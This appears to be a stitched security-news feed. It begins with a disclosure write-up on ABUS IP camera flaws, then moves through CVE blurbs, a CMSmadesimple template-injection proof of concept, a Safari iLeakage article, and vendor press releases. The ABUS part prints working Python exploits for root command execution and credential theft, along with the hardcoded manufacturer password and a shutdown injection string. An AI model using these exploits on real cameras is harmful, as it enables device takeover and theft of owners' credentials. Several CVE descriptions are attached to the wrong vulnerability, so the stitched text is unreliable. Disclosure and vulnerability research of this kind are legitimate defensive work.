Hardcoded manufacturer credentials and an OS command injection vulnerability in the /cgi-bin/mft/ directory on ABUS TVIP TVIP20050 LM.1.6.18, TVIP10051 LM.1.6.18, TVIP11050 MG.1.6.03.05, TVIP20550 LM.1.6.18, TVIP10050 LM.1.6.18, TVIP11550 MG.1.6.03, TVIP21050 MG.1.6.03, and TVIP51550 MG.1.6.03 cameras allow remote attackers to execute code as root.

**Background⌗**

It was a chill friday evening when Ilias, Alexander and myself sat around our local hackspace Chaosdorf, ate some pizza and played around with the ABUS security camera we were able to get in our hands shortly before. As the company has quite some reputation in Germany, we assumed that there wouldn’t be much to find security-wise, also because this camera was one of the most expensive ones in the consumer market. Little did we know that we’d get our first CVEs and security fame that evening as well…

**Objective⌗**

> August Bremicker und Söhne KG, commonly known as ABUS, is a German manufacturer of preventative security technology based in Wetter, North Rhine-Westphalia.
> 
> *   Wikipedia

While ABUS is mostly focusing on physical security technology like door locks and chains, security cameras are also an important branch of their portfolio. Those cameras are bought from a white-label producer, branded and sold. In this case, the affected cameras were produced by taiwanese producer Grain Media with the GM812X chipset.

This means that the discovered vulnerabilities were not necessarily ABUS’ fault, as they didn’t develop the firmware. They could’ve conducted penetration tests though.

Affected by the vulnerabilities are the model numbers / lines:

*   Compact Cameras
    *   TVIP10000
    *   TVIP10001
    *   TVIP10005
    *   TVIP10005A
    *   TVIP10005B
    *   TVIP10050
    *   TVIP10051
    *   TVIP10055A
    *   TVIP10055B
    *   TVIP10500
    *   TVIP10550
    *   TVIP11000
    *   TVIP11050
    *   TVIP11500
    *   TVIP11501
    *   TVIP11502
    *   TVIP11550
    *   TVIP11551
    *   TVIP11552
*   Cameras with movable head
    *   TVIP20000
    *   TVIP20050
    *   TVIP20500
    *   TVIP20550
    *   TVIP21000
    *   TVIP21050
    *   TVIP21500
    *   TVIP21501
    *   TVIP21502
    *   TVIP21550
    *   TVIP21551
    *   TVIP21552
    *   TVIP22500
*   Dome cameras
    *   TVIP31000
    *   TVIP31001
    *   TVIP31050
    *   TVIP31500
    *   TVIP31501
    *   TVIP31550
    *   TVIP31551
    *   TVIP32500
*   Box cameras
    *   TVIP51500
    *   TVIP51550
*   Outside dome cameras
    *   TVIP71500
    *   TVIP71501
    *   TVIP71550
    *   TVIP71551
    *   TVIP72500

Those cameras were sold from 2010 to 2014.

**Timeline⌗**

*   XX-09-2018: Discovery of vulnerabilities in lab environment
*   XX-09-2018: Communication with CCC e.V. for disclosure handling
*   26-11-2018: Initial contact with ABUS, no response
*   18-02-2019: Start of responsible disclosure process with ABUS
*   03-05-2019: Public Announcement by ABUS for a replacement program
*   07-05-2019: Publication of CCC blogpost

This disclosure was picked up by German press shortly after: Heise, Golem, SPIEGEL Online

**Vulnerabilities⌗****CVE-2018-16739⌗**

Authenticated read and write access through directory traversal with command execution

**Description⌗**

Through directory traversal it is possible to utilize the file browser of the web frontend, which seems to be only for displaying file server content, for arbitrary read, write and execution. The browser can be used to read and write files outside the file server directory and to list the contents of any directory. This is done with root privileges.

The affected endpoints are:

*   /cgi-bin/admin/fileread?READ.filePath=<Path> to read the specified file
*   /cgi-bin/admin/filewrite?SAVE.filePath=<Path> to write to the specified file
*   /cgi-bin/admin/sdstate?action=filelistnas&directory=<Path> to list a directory

**Exploitation⌗**

For arbitrary read and write, the exploitation of the endpoints is as simple as it gets, by prefixing the desired path with ../../../../ or by specifying an absolute path.

A trick is required to move from arbitrary write to code execution: if a bash script is placed in the CGI scripts folder of the web server and this script is called via a web browser, the shell script is executed with root privileges. This is also the trick applied on the POC exploit:

    #!/usr/bin/env python3
    import argparse
    import requests
    import urllib
    import random
    import huepy
    
    
    def main():
        parser = argparse.ArgumentParser(description="exploit-16739")
        parser.add_argument('url', type=str, help='target url including port, eg http://127.0.0.1:8080')
        parser.add_argument("cmd", type=str, help="the cmd to exec, e.g. 'ls /'")
        args = parser.parse_args()
    
        referenceID = random.randint(1000, 9999)
    
        print(huepy.cyan("[~] Exploit for CVE-2018-16739"))
        print(huepy.cyan("    Your reference number is %i." % (referenceID)))
    
        prepareShell(args.url, referenceID, args.cmd)
        execCmd(args.url, referenceID)
        readCmd(args.url, referenceID)
        mrproper(args.url, referenceID)
    
    
    def prepareShell(target, refID, cmd):
        writeCmd(target, refID, "#!/bin/sh\n%s 1>/tmp/%i.log 2>&1" % (cmd, refID))
    
    
    def writeCmd(target, refID, cmd):
        percentCmd = urllib.parse.quote(cmd)
        print(huepy.yellow("[~] writing /opt/cgi/admin/%i.sh" % (refID)))
        r = requests.get("%s/cgi-bin/admin/filewrite?SAVE.filePath=/opt/cgi/admin/%i.sh&SAVE.fileData=%s" % (target, refID, percentCmd), verify=False)
    
    
    def execCmd(target, refID):
        print(huepy.yellow("[~] Executing reference number %i..." % (refID)))
        r = requests.get("%s/cgi-bin/admin/%i.sh" % (target, refID), verify=False)
    
    
    def readCmd(target, refID):
        r = requests.get("%s/cgi-bin/admin/fileread?READ.filePath=/tmp/%i.log" % (target, refID), verify=False)
        print(huepy.green("[+] Command returned on %i:\n" % (refID)) +  r.text)
    
    
    def mrproper(target, refID):
        print(huepy.green("[+] mrproper-ing your waste..."))
        writeCmd(target, refID, "#!/bin/sh\nrm /tmp/%i.log /opt/cgi/admin/%i.sh" % (refID, refID))
        execCmd(target, refID)
    
    
    if __name__ == '__main__':
        main()
    

Note that, as the OS injection itself is blind, log output of your command(s) needs to be written into a log file and read again after the command finishes. This means that if your command runs for an hour, you’ll only be able to get the output after an hour.

**Evaluation⌗**

CVSS v2: AV:N/AC:L/Au:S/C:C/I:C/A:C = Base Score **9.0**

**CVE-2018-17558⌗**

Hardcoded administrator account with code execution as root

**Description⌗**

The web server is protected against unauthorized access by a user name and password, which can be changed by the person who purchased the camera. This is admin:12345 or admin:admin by default, dependent on software and model. This is dangerous in itself, since an attacker can exploit the fact that the owner of the camera usually does not change this password.

Regardless of the initial values for the admin user account, the web server is also configured to accept the user name manufacture with the password erutcafunam for the /cgi-bin/mft directory in the web server’s root directory. These values cannot be deleted by the owner of the camera, nor can they be changed. This means that all cameras running with the affected software versions can be accessed using this user name and password.

There are several endpoints in the /cgi-bin/mft directory. These endpoints are responsible for changing the WiFi settings of the device. These can be attacked at various points through an OS injection to execute code with root privileges:

**Evaluation⌗**

If the manufacture user account is combined with the input attack, it is possible to execute arbitrary code as root on the camera from outside, even if the owner of the camera has chosen secure passwords. These are simply bypassed.

CVSS v2: AV:N/AC:L/Au:N/C:C/I:C/A:C = Base Score **10.0**

**Exploitation⌗**

Obviously, using the hard-coded credentials for your purposes is as easy as it gets.

Bringing together the puzzle pieces “hardcoded credentials” and “OS injection” gives you endless possibilities; one of them is to leak out the (user-managed) credentials:

    #!/usr/bin/env python3
    import argparse
    import requests
    import urllib
    import huepy
    import base64
    
    
    def main():
        parser = argparse.ArgumentParser(description="exploit-17558")
        parser.add_argument('ip', type=str, help='target IP, eg 127.0.0.1')
        args = parser.parse_args()
    
        print(huepy.cyan("[~] Exploit for CVE-2018-17558"))
    
        copyCreds(args.ip) and showCreds(args.ip) and delCreds(args.ip)
    
    
    def copyCreds(target):
        print(huepy.yellow("[~] Copying creds"))
        r = requests.get("http://manufacture:erutcafunam@%s/cgi-bin/mft/wireless_mft?ap=</invalid;cp%%20/var/www/secret.passwd%%20/web/html/leakedcredentials" % (target), verify=False)
    
        if r.status_code == 200:
            print(huepy.green("[+] SUCCESSFUL!"))
            return True
        else:
            print(huepy.red("[-] Failed. Server is not vulnerable..."))
            return False
    
    
    def showCreds(target):
        print(huepy.yellow("[~] Here are the credentials of %s" % (target)))
        r = requests.get("http://%s/leakedcredentials" % (target), verify=False)
    
        if r.status_code == 200:
            print(huepy.green("[+] SUCCESSFUL! Here you go:"))
            print("Rights\t\t| Password\t|")
            for line in r.text.split("\n"):
                if "0000" in line:
                    parts = line.split(" ")
                    print("%s\t| %s\t|" % (parts[0], base64.b64decode(parts[1]).decode("utf-8")))
            return True
        else:
            print(huepy.red("[-] Failed. Server is not vulnerable..."))
            return False
    
    
    def delCreds(target):
        print(huepy.yellow("[~] Cleaning up"))
        r = requests.get("http://manufacture:erutcafunam@%s/cgi-bin/mft/wireless_mft?ap=</invalid;rm%%20/web/html/leakedcredentials" % (target), verify=False)
    
        if r.status_code == 200:
            print(huepy.green("[+] Successful. Thanks for your cooperation."))
            return True
        else:
            print(huepy.red("[-] Failed. Server is not vulnerable..."))
            return False
    
    
    if __name__ == '__main__':
        main()
    

**CVE-2018-17879⌗**

Remote code execution through OS injection

**Description⌗**

The /cgi-bin/ directory contains several scripts that are used to control and configure the camera. Among other tasks, these scripts are responsible for changes to the camera’s image settings (contrast, color values, brightness) or the network settings of the device. The attack is based on the fact that some of the scripts do not check input that comes from the user and are passed directly to the system() command. If control characters are used to spoof the user input, arbitrary C ode can be executed. For example, such an input could look like this: $(shutdown -h now). This would shut down the camera from the outside. An attacker could use this to completely take over the camera, attack the internal network (private or corporate), launch further attacks from the camera, as well as change, pause or delete the camera’s image, and completely disable the camera.

**Exploitation⌗**

As simple as wrapping a reverse shell code in $(...).

See this exploit, where the injection happens in the UPnP HTTP Port field:

    #!/usr/bin/env python3
    import argparse
    import requests
    import urllib
    import huepy
    
    
    def main():
        parser = argparse.ArgumentParser(description="exploit-17879")
        parser.add_argument('url', type=str, help='target url including port, eg http://127.0.0.1:8080')
        parser.add_argument("cmd", type=str, help="the cmd to exec, e.g. 'ls /'")
        args = parser.parse_args()
    
        print(huepy.cyan("[~] Exploit for CVE-2018-17879"))
    
        execCmd(args.url, args.cmd)
    
    
    def execCmd(target, command):
        print(huepy.green("[~] Executing command '%s'..." % (command)))
        percentCommand = urllib.parse.quote(command)
        r = requests.get("%s/cgi-bin/admin/param?action=update&General.Network.UPnP.NATTraversal.HTTPPort=1%%3e/dev/null%%202%%3e/dev/null;%s;false" % (target, percentCommand), verify=False)
        print(r.text[:-3])
        print(huepy.yellow("[~] Cleaning up..."))
        r = requests.get("%s/cgi-bin/admin/param?action=update&General.Network.UPnP.NATTraversal.HTTPPort=1337" % (target), verify=False)
    
    
    if __name__ == '__main__':
        main()
    

**Evaluation⌗**

CVSS v2: AV:N/AC:L/Au:S/C:C/I:C/A:C = Base Score **9.0**

**CVE-2018-17878⌗**

Remote code execution through buffer overflows

**Description⌗**

Almost all of the CGI scripts used by the web server take user input to know what to do. The function that is internally responsible for copying this input is sprintf(). This function is vulnerable to a buffer overflow. This allows an attacker, by typing in a specially crafted string, to write over the memory allocated to it, and thus gain complete control of the program and achieve code execution as root.

**Exploitation⌗**

Depending on the binary, buffer size and stack; as no security protections like stack canaries or NX / Data Execution Prevention are in place, this could be easily done via either Shellcode or ROP.

**Evaluation⌗**

CVSS v2: AV:N/AC:H/Au:S/C:C/I:C/A:C = Base Score **7.1**

**CVE-2018-17559⌗**

Access control bypass

**Description⌗**

The web server gets the camera feed from the CGI script /opt/cgi/jpg/image. This script delivers the current frame every second. This script is symlinked to many places in the file system. Among others to /cgi-bin/admin/image, /cgi-bin/admin/image.jpg, /tmp/video.mp4, /cgi-bin/operator/image.jpg.

Most of these endpoints are password protected in the configuration file of the webserver, boa.conf. However, on lines 314-321 it can be seen that after the script and the symlinks to the script are password protected, they are transferred somewhere else again, and these new endpoints are not password protected:

    # boa.conf, L314-321
    Auth /cgi-bin/jpg /var/www/secret.passwd
    
    # [...]
    
    Transfer /video.mp4 /tmp/video.mp4
    Transfer /video.3gp /tmp/video.mp4
    Transfer /video.mjpg /tmp/video.mp4
    Transfer /video.h264 /tmp/video.mp4
    

This results in an attacker accessing /video.mp4 or /video.mjpg being able to view the video feed without the need to authenticate.

**Exploitation⌗**

Access /video.mp4 or /video.mjpg to see the video feed without authentication.

**Evaluation⌗**

As the video stream is the most important output of a security camera, being able to circumvent the protection of the video stream is critical, especially taking into consideration what direction and perspective the camera is facing.

CVSS v2: AV:N/AC:L/Au:N/C:C/I:N/A:N = Base Score **7.8**

**Overall Evaluation & Conclusion⌗**

An attacker can completely take over the camera, attack the internal network (private or company network), launch further attacks from the camera, change or delete the image of the camera, or completely disable the camera, as well as put the camera completely out of operation. This could be particularly problematic in security-critical scenarios, e.g., criminal acts that are recorded and documented by the camera, as evidence could be lost.

While the replacement program may give end users new cameras (which are hopefully not prone to the security issues described here, but I didn’t test that), the risk of having a always-on security device with weak hardware and network access persists. Please put such devices in a separate network or VLAN, protect it with firewall rules, and avoid credential reusage. Reviewing if you really need cameras connected to the internet could be another important step in becoming more secure.

CVE-2018-17558: Five Vulnerabilities in ABUS cameras

An issue was discovered on certain ABUS TVIP cameras. The CGI scripts allow remote attackers to execute code via system() as root. There are several injection points in various scripts.

CVE-2018-17879: Five Vulnerabilities in ABUS cameras

Buffer Overflow vulnerability in certain ABUS TVIP cameras allows attackers to gain control of the program via crafted string sent to sprintf() function.

CVE-2018-17878: Five Vulnerabilities in ABUS cameras

An issue in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted payload to the Content Manager Menu component.

**CMSmadesimple SSTI v2.2.18****Author: (Sergio)**

**Description:** Server Side Template Injection (SSTI) vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to use native template syntax to inject a malicious payload into a template, which is then executed server-side.

**Attack Vectors:** A SSTI vulnerability in the sanitization of the entry in the Content of "Content - Content Manager Menu" allows injecting a malicious payload into a template code that will be executed when the user accesses the web page.

**POC:**

When logging into the panel, we will go to the "Content Manager- Title" section off Content Menu.

  
We edit that Content field with a template malicious payload.**SSTI Payload:**  
In the following image you can see the embedded code that executes the payload in the main web.

  
We identify the technology used with the following payload.**SSTI Payload:**

  
And the result is the following:

  
Since the payload has worked we know that it uses Smarty, then we obtain the Smarty version with the following payload:**SSTI Payload:**

And in the result we can see the version of Smarty using the SSTI:

  
We can also use the following payload to see the server name variable:**SSTI Payload:**

{$smarty.server.SERVER\_NAME}

  
Below is the result of the SSTI payload with the server name:

  
**Additional Information:**

http://www.cmsmadesimple.org/

https://owasp.org/Top10/es/A03\_2021-Injection/

CVE-2023-43352: GitHub - sromanhu/CVE-2023-43352-CMSmadesimple-SSTI--Content: SSTI vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to use native template syntax to inject a malicious payload into a te

Categories: Exploits and vulnerabilities
Categories: News
Apple has fixed a bunch of security flaws, but not iLeakage, a side-channel vulnerability in Safari.



(Read more...)




The post Patch...later? Safari iLeakage bug not fixed appeared first on Malwarebytes Labs.

Apple has released updates for its phones, Macs, iPads, watches, and TV streaming devices, fixing a bunch of security problems. But amid all that activity, one fix is notably absent—there is nothing to address the vulnerability dubbed iLeakage.

iLeakage is a side-channel attack that can force the Safari browser to divulge secrets like passwords and Gmail messages.

A side-channel attack looks at the indirect effects of a computer program, or computer hardware, which can reveal things about what's happening under the hood. It's like a thief looking at your house and concluding from the fact that there are no lights on and the car isn't in the driveway that you aren't home. The lights and the empty driveway are side channels.

In the case of iLeakage, the side channel is speculative execution, a performance enhancement feature found in modern CPUs. iLeakage is just the latest in a whole family of speculative execution bugs, known as Spectre, dating back to 2017.

Virtually every modern CPU uses some kind of performance optimization where it attempts to predict what a program will do next. Once a prediction is made, the CPU will execute instructions ahead of time, so that the answer is there immediately should you need it. If the CPU realizes its prediction was wrong it has to revert all the changes it made, but sometimes speculative execution leaves traces in the CPU's microarchitectural state, and especially the cache.

A group of cybersecurity researchers used these traces to show how an attacker can make Safari reveal sensitive information. The attacks use a malicious web page that exploits iLeakage. The page can be used to open Instagram, Gmail, YouTube, or any other website in a new tab. Behind the scenes, the same Safari computer process renders both the malicious page and the target web page, allowing the malicious page to pull information from the target, such as auto-filled passwords, using iLeakage.

Although there are no fixes for iLeakage yet, there are mitigations. Unfortunately, all of them come with significant caveats. According to the researchers, the super-secure Lock Down mode that's available on Apple's Macs, phones, and tablets will disable iLeakage, but Lock Down mode can impact performance and, as Apple points out, "When Lockdown Mode is enabled, your device won’t function like it typically does."

You can also stop iLeakage by disabling JavaScript execution in your browser, but this will likely impact the behavior of every website you visit, making many of them unusable.

There is another mitigation that specifically targets iLeakage, but it's macOS only and it's not enabled by default. On top of that, the mitigation is considered unstable, and it requires users to open a computer terminal window, which will be beyond many users' comfort zones. If you really want to go there, you can read the instructions on the iLeakage site, under "How can I defend against iLeakage." We suggest that unless you're a high value target you probably don't need to bother, and if you are a high value target you should enable Lock Down mode anyway.

There is no evidence that iLeakage has been abused in the wild, and figuring out how the researchers did it will be a significant undertaking for cybercriminals.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Patch...later? Safari iLeakage bug not fixed

The newly launched AI & ML Security Library allows developers to analyze the code used in machine learning systems to identify and address risks.

As part of "shift left" to incorporate security discussions earlier in the software development life cycle, organizations are beginning to look at threat modeling to identify security flaws in software design. With developers increasingly incorporating machine learning in their applications, threat modeling is necessary for identifying the risks to the organization.

"People are still grappling with the whole idea that when you use that very new technology \[machine learning\], it brings along a bunch of risk, as well," says Gary McGraw, co-founder of the Berryville Institute of Machine Learning. "I've been in the unenviable position of saying, 'Well, there's this risk, and there's that risk, and the sky is falling,' and everybody goes, 'Well, what am I supposed to do about that?'"

There have been many conversations about machine learning risk, but the difficulty lies in figuring out how to address them, McGraw says. Threat modeling – identifying the types of threats that can cause harm to the organization – helps organizations think through security risks in machine learning systems such as data poisoning, input manipulation, and data extraction. If developers could understand the security flaws in their designs by threat modeling, it would reduce the time spent on security testing during development and before production. NIST's Guidelines on Minimum Standards for Developer Verification of Software recommends threat modeling to look for design-level security issues.

IriusRisk’s threat modeling tool addresses this challenge by automating both threat modeling and architecture risk analysis. Developers and security teams can import the code into the tool to generate diagrams and threat models. Threat modeling templates make threat modeling accessible even to those not familiar with diagramming tools or risk analysis.

And the newly launched AI & ML Security Library allows organizations using IriusRisk to threat model the machine learning system they are planning in order to understand what the security risks are, as well as how to mitigate those risks.

“We're finally getting around to building machinery that people can use to address the risk and control the risk," says McGraw, who is also a member of IriusRisk’s advisory board. "When you put machine learning into your \[system\] design, and you're using IriusRisk, now you know what risks are involved and what to do about that."

**What ML Threat Modeling Looks Like**

IriusRisk's AI & ML Security Library helps organizations ask necessary questions. For example:

1.  Asking where the data being used to train the machine learning model came from. It's important to also ask whether anyone had the opportunity to embed incorrect or malicious data to make the machine do the wrong thing.
2.  Consider how the machine keeps learning once it is in production. Machine learning systems that are online and keep on learning from users are more dangerous than the ones that are not online. "It depends on who is using it. Is it your people? Is it bad people? Is it everybody on Twitter, or X?" McGraw says, noting there have been examples of past projects that had to be taken offline after it learned objectionable information.
3.  Ask if confidential information can be extracted from the machine. If you put confidential information into your machine learning algorithm, it is not protected by cryptographic means and can be extracted. "If you put the data in the machine, it's in the machine," McGraw says. "You need to think about making sure that people using your machine learning system cannot extract that confidential data."

The AI & ML Security Library is based on the BIML ML Security Risk Framework, a taxonomy of machine learning threats, as well as an architectural risk assessment of typical machine learning components developed by McGraw. The framework is designed to be used by developers, engineers, and designers creating applications and services that use machine learning in the early design and development phases of the project. With IriusRisk's library, everybody who is using machine learning can use BIML's framework.

The AI & ML Security Library is available to IriusRisk customers and those using the community edition of the platform.

**Time to Be Threat Modeling**

The AI & ML Security Library was developed in response to interest from organizations about how to analyze and secure AI and ML systems, according to Stephen de Vries, CEO of IriusRisk.

"We have seen a surge in interest from our customers in the finance and technology sectors for guidance on how to analyze, and secure design ML systems," de Vries said in a statement. "Since these are often new projects that are still in the design phase, performing threat modeling here adds a lot of value, because those teams will very quickly understand where the security goalposts are – and what they need to do in order to get there."

The library doesn't help organizations that don't have visibility into their machine learning use. Just as organizations can have shadow IT – where different business stakeholders set up their own servers and Web applications without IT oversight – they can also have shadow machine learning, McGraw says. Different departments are trying out new applications and tools, but there is a gap between what individual employees are using and what risks IT and security teams know about.

“Everybody's like, 'I don't think I have any machine learning in my organization,'" McGraw says. "But as soon as they find out that they do … they find it everywhere.”

Many organizations do not incorporate threat modeling during software design, and those that do rely on manual processes where a person analyzes the threats one at a time.

"If you have a mature threat modeling program and you're using a tool like IriusRisk, you can also now handle machine learning. So the people who are already doing the best are going to do even better," McGraw says. "What about the people who aren't doing threat modeling? Maybe they should start. It's not new. It's time to do it."

IriusRisk Brings Threat Modeling to Machine Learning Systems

**PRESS RELEASE**

**DENVER****,** **Oct. 26, 2023** **/PRNewswire/ --** New data from the Lumen Technologies (NYSE: LUMN) Distributed Denial of Service (DDoS) mitigation platform landed the banking industry in the unenviable position of being the most targeted vertical of Q3 2023. This is the first time the banking industry topped Lumen's "most targeted verticals" list and was largely due to the events of a single day: Sept. 21, 2023.

On that day, a single banking customer was targeted with more than 230 DDoS attacks – a whopping 4,500% increase over the daily average for that industry – yet it experienced no downtime. Had the attackers been successful, they could have caused significant damage in the form of lost business, remediation costs and reputational damage.

"The successful mitigations for this banking customer can be traced back to Lumen's multi-layered approach to DDoS mitigation," said Brett Lemarinel, director of unified threat management for Lumen. "It starts at our network, where countermeasures are built in, and our intelligent routing technology, which sends excess traffic through our 500+ scrubbing locations. Our DDoS customers have an added layer of protection from Rapid Threat Defense, our proprietary capability that utilizes threat intelligence from Lumen Black Lotus Labs® to block DDoS botnet traffic before it reaches the customer's environment."

Lemarinel continued, "This should be a warning to all other businesses. More than 230 mitigations in a single day suggests the threat actor was determined to wreak havoc on this customer. Even though the attacker failed, the activity we saw on Sept. 21 is a potent reminder that any business can be in an attacker's crosshairs on any given day."

**Other notable findings in the report include:**

A never-before-seen, four-vector combination was attempted during the Sept. 21 event. The four-vector combination included DNS Amplification, IP Fragmentation, Invalid Packets and Static Filtering. Cyber attackers frequently modify their vector combinations as they attempt to defeat mitigation strategies, but the Lumen DDoS mitigation platform has the flexibility required to recognize and stop these attacks before they impact the targeted customers. The total number of attacks decreased in Q3 2023. Attackers frequently run their operations like a business and, as with any business, cyberattacks have seasonal ups and downs. In Q3 2023, Lumen mitigated 4,217 attacks, which was a 23% quarter-over-quarter decrease and a 24% annual decrease. The banking industry was also the most-targeted vertical for application threats, according to Lumen's application protection partner, ThreatX. Among all industries, the highest percentage of blocked traffic (25.5%) came from programmatic access, which are suspicious, automated attempts to access a web application. This number is up 89% from the previous quarter. The banking sector experienced a significant percentage of "Attacks Against Authentication" (nearly 25%), which are used to gain unauthorized access to financial data. Financial institutions are attractive to attackers, as evidenced by the high attack ratio and combination of brute-force attacks that targeted banks in Q3. Protecting financial data is paramount, but robust web application and API protection solutions can help protect the industry.

"The Q3 ThreatX application attack analysis underscores the critical importance of bot protection and the need for awareness of industry-specific threats," said Neil Weitzel, director, Security Operations Center at ThreatX. "The especially high number of programmatic access threats this quarter underscores the prevalence of bots in API and application attacks. In addition, our findings reveal variations in threats across industries, so businesses must stay vigilant and proactive to safeguard their applications and APIs."

**About Lumen Technologies**

Lumen connects the world. We are igniting business growth by connecting people, data, and applications – quickly, securely, and effortlessly. Everything we do at Lumen takes advantage of our network strength. From metro connectivity to long-haul data transport to our edge cloud, security, and managed service capabilities, we meet our customers' needs today and as they build for tomorrow. For news and insights visit news.lumen.com, LinkedIn: /lumentechnologies, Twitter: @lumentechco, Facebook: /lumentechnologies, Instagram: @lumentechnologies, and YouTube: /lumentechnologies.

**About ThreatX**

ThreatX is managed API and application protection that lets you secure them with confidence, not complexity. It blocks botnets and advanced attacks in real time, letting enterprises keep attackers at bay without lifting a finger. Trusted by companies in every industry across the globe, ThreatX profiles attackers and blocks advanced risks to protect APIs and applications 24/7. Learn more at https://www.threatx.com.

Lumen Q3 DDoS Report: Banking Was the Most Targeted Industry for the First Time

**PRESS RELEASE**

**SANTA CLARA, Calif.,Oct. 25, 2023/PRNewswire/ --** Malwarebytes, a global leader in real-time cyber protection, today launched an essential new consumer solution, Identity Theft Protection. The new service helps individuals secure their digital identities and defend against identity and online threats. Malwarebytes Identity Theft Protection includes real-time identity monitoring and alerts, robust credit protection and reporting and live agent-supported identity recovery and resolution services – backed by up to a $2 million identity theft insurance policy. The new service, paired with Malwarebytes' award-winning antivirus and VPN software, helps prevent criminals from stealing or using personal information to drain financial accounts, hack or impersonate social media accounts, damage a user's reputation or other online and identity-based attacks.

Today's digital life is complex and sometimes deceptive. According to new research from Malwarebytes, identity theft ranks as people's third biggest concern when it comes to online security, just behind fear of financial accounts and personal data being breached – both of which play into identity theft. Of those surveyed 64% agree that identity theft protection is important, but only 13% have it. Consumers are also increasingly fearful of new technology. Malwarebytes gives consumers protection they can trust, alerting them when we see their information has been stolen and providing live agent support to restore their identity and replace lost items.

"Even as we spend more and more of our lives online, we all know that the internet today can't be trusted," said Mark Beare, GM of Consumer Business Unit, Malwarebytes. "Consumers need a tool that not only blocks threats like malware and phishing, but that also monitors and protects their digital identity, be that social media profiles, bank accounts or email. With Malwarebytes Identity Theft Protection, we provide a robust and exhaustive suite of services so individuals and families can rest easy knowing that we are actively working to keep them safe and protect their digital identity."

Malwarebytes Identity Theft Protection is available globally through a variety of tiered offerings that provide protection via computers and mobile devices across multiple operating systems including Windows, macOS, Android and iOS.

**Key features include:**

*   Identity Monitoring & Alerts**:** Continuously scours a multitude of websites and data sources, including the Dark Web, to alert if personal information is being illegally traded or sold. Recommends actions to take to protect yourself.
*   Credit Monitoring and Protection**:** Ongoing tracking of credit for critical changes, such as new accounts or inquiries and applications for new lines of credit. A credit freeze also can be activated\*.
*   Breach IQ**:** Provides a safety score and alerts if personal information is part of a known breach\*.
*   Identity Recovery & Resolution**:** Assistance in the event of an identity theft incident, including guided steps to report the crime, dispute fraudulent charges, restore identity and recuperate financial losses incurred. Includes up to a $2 million insurance policy.

To read more about the latest threats and cyber protection strategies, visit our blog, or follow us on Facebook, Instagram, LinkedIn, TikTok and Twitter.

_\*U.S. only_

**About Malwarebytes**

Malwarebytes believes that when people and organizations are free from threats, they are free to thrive. Founded in 2008, Malwarebytes CEO Marcin Kleczynski had one mission: to rid the world of malware. Today, Malwarebytes' award-winning endpoint protection, privacy and threat prevention solutions along with a world-class team of threat researchers protect millions of individuals and thousands of businesses across the globe daily. Malwarebytes solutions are consistently recognized by independent tests including AVLAB and AV-TEST. The company is headquartered in California with offices in Europe and Asia. For more information and career opportunities, visit https://www.malwarebytes.com.

Malwarebytes Announces Consumer Identity Theft Protection Solution

An issue in Mintty v.3.6.4 and before allows a remote attacker to execute arbitrary code via crafted commands to the terminal.

CVE-2023-39726: "[31m"?! ANSI Terminal security in 2023 and finding 10 CVEs

**PRESS RELEASE**

**CAMBRIDGE, England****,** **Oct. 26, 2023** **/PRNewswire/ --** Darktrace, a global leader in cyber security AI, today unveiled a new Darktrace/Cloud™ solution based on its unique Self-Learning AI. The new solution provides comprehensive visibility of cloud architectures, real-time cloud-native threat detection and response, and prioritized recommendations and actions to help security teams manage misconfigurations and strengthen compliance. When combined with insight from Darktrace solutions for network, email, apps, zero trust and endpoint, Darktrace/Cloud provides a deeper, contextualized understanding of the risks and threats currently facing an organization's digital estate.  

According to a recent report, "Gartner® anticipates over 99 percent of cloud breaches will be based on a customer error, account takeover or misconfiguration until 2027"\[1\]. Cloud environments are constantly evolving so security professionals need to increase the level of visibility while keeping up with changing compliance, risk and security requirements. The rise of cloud-native technologies including containers, Kubernetes and microservices also require new tools and techniques for detecting and responding to known and novel threats.

"Unlike static cloud security tools that provide snapshots of a specific point in time, Darktrace/Cloud is real-time, all the time. Our Self-Learning AI continuously learns patterns between workloads, assets, policy configurations and identities to provide a dynamic view of cloud architectures. We analyze the entire cloud stack from data to control plane, combining an understanding of architecture and network with a new flexible, scalable deployment model," said Jack Stockdale, Chief Technology Officer, Darktrace. "Our innovative approach to cloud security is built on more than a decade of leadership in Cyber AI that is already protecting our customers' critical business areas from network and email to operational technology."

Available today, the new capabilities in Darktrace/Cloud include:

*   **Comprehensive visibility and architecture modeling** for insights into the constantly changing nature of cloud environments. This visibility is constructed dynamically from configuration, network, users and identity and access management (IAM) data. Darktrace establishes patterns of life for cloud resources, identities, and services to understand who has access to what and how. This is critical for detecting anomalies and unknown threats.
*   **Universal attack path modeling** provides a dynamic view of where attackers may look to move next. Darktrace brings together real-time cloud data and a deep understanding of your cloud environment with a platform approach that provides insights about risks from other covered areas of the business (e.g., network, email) to highlight potential attack paths and prioritize important assets to secure.
*   **Unique real-time and cloud-native threat detection and response** that provides a dynamic view of known and novel threats within the cloud. Darktrace combines deep cloud attack path knowledge with real-time anomaly and threat detection through cloud-native autonomous response actions, such as detaching a policy from a user or removing a workload from a security group.
*   **Prioritized cloud posture management** that starts by examining cloud configurations against common compliance frameworks. Where misconfigurations are detected, Darktrace provides a prioritized view of what to fix first, based on a risk profile generated from security and business context. Guided steps can be provided to help teams proactively address these before they become a significant issue.
*   **Cost discovery** to provide a better understanding of cloud resource allocation. This helps teams contextualize their cloud resources according to security and business priorities.
*   **Communication and collaboration capabilities** to streamline workflows between security teams and DevOps teams. Tickets can be created on demand, teams can communicate directly via messaging platforms, and alerts and anomaly detections can be sent to Security Information & Event Management (SIEM) or Security Orchestration, Automation and Response (SOAR) products and the Darktrace Mobile app so they can be alerted on the go.
*   **Flexible deployment options** include an agentless deployment by default so organizations can be up and running in minutes. Teams can use the dynamic architectural view and risk context to decide where to deploy agents for enhanced real-time actions and deeper inspection.

Sykes Cottages, a cloud-native travel agency platform in the UK, has experienced significant growth in the last five years and has relied on the cloud to help them scale throughout this period.

"When it comes to cybersecurity, having visibility and an understanding of what you've got and your risks is critical. If I don't know it's there, I can't protect it," said Jonny Mattey, Head of Cybersecurity, Sykes Cottages. "Having a holistic, live view of our cloud environment enables us to work pragmatically and use AI to cut down management time so that we can address security risks and improve our resilience."

